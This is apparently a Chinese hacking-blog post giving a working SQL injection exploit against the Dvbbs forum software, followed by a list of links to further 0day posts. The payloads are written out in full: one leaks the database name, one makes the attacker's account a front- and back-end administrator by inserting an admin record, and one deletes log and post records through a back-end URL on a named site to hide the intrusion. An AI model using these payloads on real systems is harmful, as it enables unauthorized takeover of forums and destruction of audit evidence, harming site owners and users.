内部板块发布:
利用:
发帖子,标题为下面的sql语句,然后点评论。0为中立, 1为支持, 2为反对 都行。
这时sql语句被执行
库名:
a','',1,'hang','2008-2-4','',2);update/**/dv_user/**/set/**/useremail=db_name()/**/where/**/username='hang'--
加前台和后台管理员:
a','',1,'hang','2008-2-4','',2);update dv_user set UserGroupID=1 where username='hang';insert into dv_admin(Username,Password,Flag,Adduser)values('hang','965eb72c92a549dd',',4,','hang')--
清理数据库记录(有三个表):
http://www.lnhonker.cn/Admin/help.asp?action=view&id=1;delete/**/from/**/dv_log/**/where/**/l_username='hang';delete/**/from/**/dv_topic/**/where/**/PostUsername='hang';delete/**/from/**/Dv_Appraise/**/where/**/UserName='hang'--
(因为是通过后台注入来执行delete语句,所以最后Dv_log还是有一条关于后台help.asp文件访问记录)
来源:小航's Blog
只显示10条记录相关文章
ecshop最新版(v272) 本地包含漏洞ODAY(鸡肋) (浏览: 15878, 评论: 0)
动网PHP论坛indivgroup_dispbbs.php sql注入漏洞 (浏览: 9355, 评论: 0)
dvbbs php2.0 几处0day (浏览: 12198, 评论: 0)
V5-SHOP商城0day (浏览: 9278, 评论: 0)
无忧购物时尚ASP版 oday (浏览: 11865, 评论: 0)
ECSHOP 2.7.X注入漏洞_20100507 (浏览: 15866, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11555, 评论: 0)
良精所有产品通杀 (浏览: 8702, 评论: 0)
shopwind oday 分析 (浏览: 8891, 评论: 0)
云起企业建站系统通杀oday (浏览: 11023, 评论: 0)
动网PHP论坛indivgroup_dispbbs.php sql注入漏洞 (浏览: 9355, 评论: 0)
dvbbs php2.0 几处0day (浏览: 12198, 评论: 0)
V5-SHOP商城0day (浏览: 9278, 评论: 0)
无忧购物时尚ASP版 oday (浏览: 11865, 评论: 0)
ECSHOP 2.7.X注入漏洞_20100507 (浏览: 15866, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11555, 评论: 0)
良精所有产品通杀 (浏览: 8702, 评论: 0)
shopwind oday 分析 (浏览: 8891, 评论: 0)
云起企业建站系统通杀oday (浏览: 11023, 评论: 0)
Trackbacks
 |
 |
 |
